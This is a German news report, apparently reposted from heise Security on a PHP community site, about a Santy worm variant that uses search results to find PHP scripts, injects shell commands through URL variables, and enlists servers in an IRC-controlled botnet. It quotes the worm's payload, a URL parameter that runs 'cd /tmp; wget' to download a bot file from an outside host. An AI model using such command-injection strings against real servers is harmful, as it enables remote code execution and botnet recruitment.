Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Erfahrungen

Es sind noch keine Kommentare vorhanden.

Hier Kannst Du einen Kommentar verfassen


Bitte gib mindestens 10 Zeichen ein.
Wird geladen... Bitte warte.
* Pflichtangabe

Verwandte Beiträge

NGI bringt DSL-Flatrate

Die Firma NGI (New Generation Internet) nutzt das verlängerte Wochenende, um seine Kunden in einer Mailing-Aktion auf den Start der DSL-Flatrate hinzuweisen. Ab Dienstag soll NGI-DSL mit einem Downstream von 1 MBit/s und einem Upstream von 256 kBit/s bei ...

admin

Autor : admin
Kategorie: Software & Web-Development

PHP-Resource.de USERTREFFEN KÖLN 07/2009

Es ist mal wieder soweit! Die Moderatoren, Administratoren und User treffen sich zum 4. Usertreffen in Köln. ...

admin

Autor : admin
Kategorie: Dies und Das

Nokia kündigt SMS-Nachfolger an

Der finnische Telekom-Konzern Nokia hat auf dem 3GSM World Congress die nächste Generation von SMS vorgestellt. Die MMS (Multimedia Messaging Service) getaufte SMS-Erweiterung soll den Versand von digitalen Bildern oder Videos zusammen mit den bisher beka ...

admin

Autor : admin
Kategorie: Software & Web-Development

JPEG-Patent durch Yahoo lizenziert

Wieder hat sich ein Unternehmen gefunden, das das so genannte JPEG-Patent von Forgent lizenziert hat. Der Halter des Patents 4,698,672 teilt mit, der Internetdienstleister Yahoo habe ein Lizenzabkommen unterzeichnet. Damit erübrigten sich weitere rechtlic ...

admin

Autor : admin
Kategorie: Software & Web-Development

Kostenlos: In zwei Minuten Flipbook erstellen

In deinem PDF blättern, statt scrollen? Kurze Ladezeiten, statt ewigem Download? Dazu noch Videos einbinden und dein PDF interaktiv werden lassen? ...

admin

Autor : admin
Kategorie: Software & Web-Development

WinLinux 2001: "Der freundliche Pinguin"

Linux muss nicht kompliziert sein, das zumindest verspricht "WinLinux 2001", das erste Linux für Windows 95/98 und ME. Ohne Neupartitionierung installiert WinLinux ein Linux-System auf einem Windows-System. ...

admin

Autor : admin
Kategorie: Software & Web-Development

Finde den richtigen Job
Düsseldorf, Deutschland

Pressemitteilung veröffentlichen

pressemitteilung veröffentlichen

Teile Deine News und Informationen mit anderen

Du möchtest andere User über ein interessantes IT-Thema informieren, dann melde Dich jetzt an und teile es mit unserer PHP-Community

mehr erfahren

Angebot eintragen